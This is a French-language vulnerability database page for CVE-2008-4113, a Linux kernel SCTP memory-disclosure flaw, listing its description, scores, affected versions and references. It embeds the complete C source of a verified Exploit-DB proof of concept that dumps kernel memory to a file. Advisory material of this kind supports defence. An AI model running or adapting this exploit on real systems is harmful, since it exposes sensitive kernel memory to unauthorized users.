CVE-2008-4113 : Détail

CVE-2008-4113

A01-Broken Access Control
0.18%V4
Local
2008-09-16
21h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an untrusted length value to limit copying of data from kernel memory, which allows local users to obtain sensitive information via a crafted SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.7 AV:L/AC:M/Au:N/C:C/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 7618

Date de publication : 2008-12-28 23h00 +00:00
Auteur : Jon Oberheide
EDB Vérifié : Yes

/* * cve-2008-4113.c * * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 * * The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream * Control Transmission Protocol (sctp) implementation in the Linux kernel * before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an * untrusted length value to limit copying of data from kernel memory, which * allows local users to obtain sensitive information via a crafted * SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function. * * Notes: * * If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an * unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory * out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will * trigger a kernel OOPS. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/sctp.h> #ifndef SCTP_HMAC_IDENT #define SCTP_HMAC_IDENT 22 #endif #define DUMP_SIZE 256*1024 #define DUMP_FILE "mem.dump" int main(int argc, char **argv) { int ret, sock; FILE *dumpfile; char *memdump, *err; socklen_t memlen = DUMP_SIZE; memdump = malloc(DUMP_SIZE); if (!memdump) { err = "malloc(3) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } memset(memdump, 0, DUMP_SIZE); printf("[+] creating IPPROTO_SCTP socket\n"); sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); if (sock == -1) { err = "socket(2) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen); ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen); if (ret == -1) { err = "getsockopt(2) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE); dumpfile = fopen(DUMP_FILE, "wb"); if (!dumpfile) { err = "fopen(3) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } fwrite(memdump, 1, memlen, dumpfile); fclose(dumpfile); printf("[+] done.\n"); return 0; } // milw0rm.com [2008-12-29]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 2.6.25.14

Linux>>Linux_kernel >> Version 2.2.27

Linux>>Linux_kernel >> Version 2.4.36

Linux>>Linux_kernel >> Version 2.4.36.1

Linux>>Linux_kernel >> Version 2.4.36.2

Linux>>Linux_kernel >> Version 2.4.36.3

Linux>>Linux_kernel >> Version 2.4.36.4

Linux>>Linux_kernel >> Version 2.4.36.5

Linux>>Linux_kernel >> Version 2.4.36.6

Linux>>Linux_kernel >> Version 2.6

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.19.4

Linux>>Linux_kernel >> Version 2.6.19.5

Linux>>Linux_kernel >> Version 2.6.19.6

Linux>>Linux_kernel >> Version 2.6.19.7

Linux>>Linux_kernel >> Version 2.6.20.16

Linux>>Linux_kernel >> Version 2.6.20.17

Linux>>Linux_kernel >> Version 2.6.20.18

Linux>>Linux_kernel >> Version 2.6.20.19

Linux>>Linux_kernel >> Version 2.6.20.20

Linux>>Linux_kernel >> Version 2.6.20.21

Linux>>Linux_kernel >> Version 2.6.21.5

Linux>>Linux_kernel >> Version 2.6.21.6

Linux>>Linux_kernel >> Version 2.6.21.7

Linux>>Linux_kernel >> Version 2.6.22

Linux>>Linux_kernel >> Version 2.6.22.2

Linux>>Linux_kernel >> Version 2.6.22.8

Linux>>Linux_kernel >> Version 2.6.22.9

Linux>>Linux_kernel >> Version 2.6.22.10

Linux>>Linux_kernel >> Version 2.6.22.11

Linux>>Linux_kernel >> Version 2.6.22.12

Linux>>Linux_kernel >> Version 2.6.22.13

Linux>>Linux_kernel >> Version 2.6.22.14

Linux>>Linux_kernel >> Version 2.6.22.15

Linux>>Linux_kernel >> Version 2.6.22.17

Linux>>Linux_kernel >> Version 2.6.22.18

Linux>>Linux_kernel >> Version 2.6.22.19

Linux>>Linux_kernel >> Version 2.6.22.20

Linux>>Linux_kernel >> Version 2.6.22.21

Linux>>Linux_kernel >> Version 2.6.22.22

Linux>>Linux_kernel >> Version 2.6.22_rc1

    Linux>>Linux_kernel >> Version 2.6.22_rc7

      Linux>>Linux_kernel >> Version 2.6.23

      Linux>>Linux_kernel >> Version 2.6.23.8

      Linux>>Linux_kernel >> Version 2.6.23.9

      Linux>>Linux_kernel >> Version 2.6.23.10

      Linux>>Linux_kernel >> Version 2.6.23.11

      Linux>>Linux_kernel >> Version 2.6.23.12

      Linux>>Linux_kernel >> Version 2.6.23.13

      Linux>>Linux_kernel >> Version 2.6.23.15

      Linux>>Linux_kernel >> Version 2.6.23.16

      Linux>>Linux_kernel >> Version 2.6.23.17

      Linux>>Linux_kernel >> Version 2.6.23_rc1

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24.1

        Linux>>Linux_kernel >> Version 2.6.24.2

        Linux>>Linux_kernel >> Version 2.6.24.3

        Linux>>Linux_kernel >> Version 2.6.24.4

        Linux>>Linux_kernel >> Version 2.6.24.5

        Linux>>Linux_kernel >> Version 2.6.24.6

        Linux>>Linux_kernel >> Version 2.6.24.7

        Linux>>Linux_kernel >> Version 2.6.24_rc1

          Linux>>Linux_kernel >> Version 2.6.24_rc4

            Linux>>Linux_kernel >> Version 2.6.24_rc5

              Linux>>Linux_kernel >> Version 2.6.25

              Linux>>Linux_kernel >> Version 2.6.25

                Linux>>Linux_kernel >> Version 2.6.25.1

                Linux>>Linux_kernel >> Version 2.6.25.1

                  Linux>>Linux_kernel >> Version 2.6.25.2

                  Linux>>Linux_kernel >> Version 2.6.25.2

                    Linux>>Linux_kernel >> Version 2.6.25.3

                    Linux>>Linux_kernel >> Version 2.6.25.3

                      Linux>>Linux_kernel >> Version 2.6.25.4

                      Linux>>Linux_kernel >> Version 2.6.25.4

                        Linux>>Linux_kernel >> Version 2.6.25.5

                        Linux>>Linux_kernel >> Version 2.6.25.5

                          Linux>>Linux_kernel >> Version 2.6.25.6

                          Linux>>Linux_kernel >> Version 2.6.25.6

                            Linux>>Linux_kernel >> Version 2.6.25.7

                            Linux>>Linux_kernel >> Version 2.6.25.7

                              Linux>>Linux_kernel >> Version 2.6.25.8

                              Linux>>Linux_kernel >> Version 2.6.25.8

                                Linux>>Linux_kernel >> Version 2.6.25.9

                                Linux>>Linux_kernel >> Version 2.6.25.9

                                  Linux>>Linux_kernel >> Version 2.6.25.10

                                  Linux>>Linux_kernel >> Version 2.6.25.10

                                    Linux>>Linux_kernel >> Version 2.6.25.11

                                    Linux>>Linux_kernel >> Version 2.6.25.11

                                      Linux>>Linux_kernel >> Version 2.6.25.12

                                      Linux>>Linux_kernel >> Version 2.6.25.12

                                        Linux>>Linux_kernel >> Version 2.6.25.13

                                        Linux>>Linux_kernel >> Version 2.6.25.15

                                        Références

                                        http://www.securitytracker.com/id?1021000
                                        Tags : vdb-entry, x_refsource_SECTRACK
                                        http://secunia.com/advisories/32190
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://securityreason.com/securityalert/4266
                                        Tags : third-party-advisory, x_refsource_SREASON
                                        http://www.debian.org/security/2008/dsa-1655
                                        Tags : vendor-advisory, x_refsource_DEBIAN
                                        http://secunia.com/advisories/32393
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        https://www.exploit-db.com/exploits/7618
                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                        http://www.securityfocus.com/bid/31121
                                        Tags : vdb-entry, x_refsource_BID
                                        http://www.ubuntu.com/usn/usn-659-1
                                        Tags : vendor-advisory, x_refsource_UBUNTU
                                        http://www.redhat.com/support/errata/RHSA-2008-0857.html
                                        Tags : vendor-advisory, x_refsource_REDHAT
                                        http://secunia.com/advisories/32315
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://www.openwall.com/lists/oss-security/2008/09/26/6
                                        Tags : mailing-list, x_refsource_MLIST